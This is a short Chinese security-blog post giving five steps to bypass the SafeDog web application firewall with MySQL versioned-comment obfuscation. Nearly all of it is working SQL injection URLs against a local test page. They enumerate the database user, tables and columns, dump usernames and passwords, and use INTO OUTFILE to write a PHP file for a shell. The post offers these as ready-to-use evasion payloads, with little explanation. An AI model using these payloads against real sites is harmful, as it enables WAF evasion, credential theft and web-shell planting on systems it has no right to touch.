简单五步教你如何绕过安全狗

阅读量461618

|评论8

发布时间 : 2018-05-24 19:13:00

今天我们将分享绕过安全狗的方法,各位帽子兄弟可以参考学习。

PS:测试请断网,据说log会上传

熟悉的页面,没错绕过它,核心方法:Mysql注释绕过

 

0x00 环境

 

0x01 看回显获取用户

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,3)

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))

 

0x02 获取表名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))

0x03 获取列名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)

0x04 获取数据

http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password) from/*!`users`*/)

0x05 Getshell

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)

本文由猎户攻防实验室原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/146039

安全客 - 有思想的安全新媒体

分享到:微信
+16赞
收藏
猎户攻防实验室
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66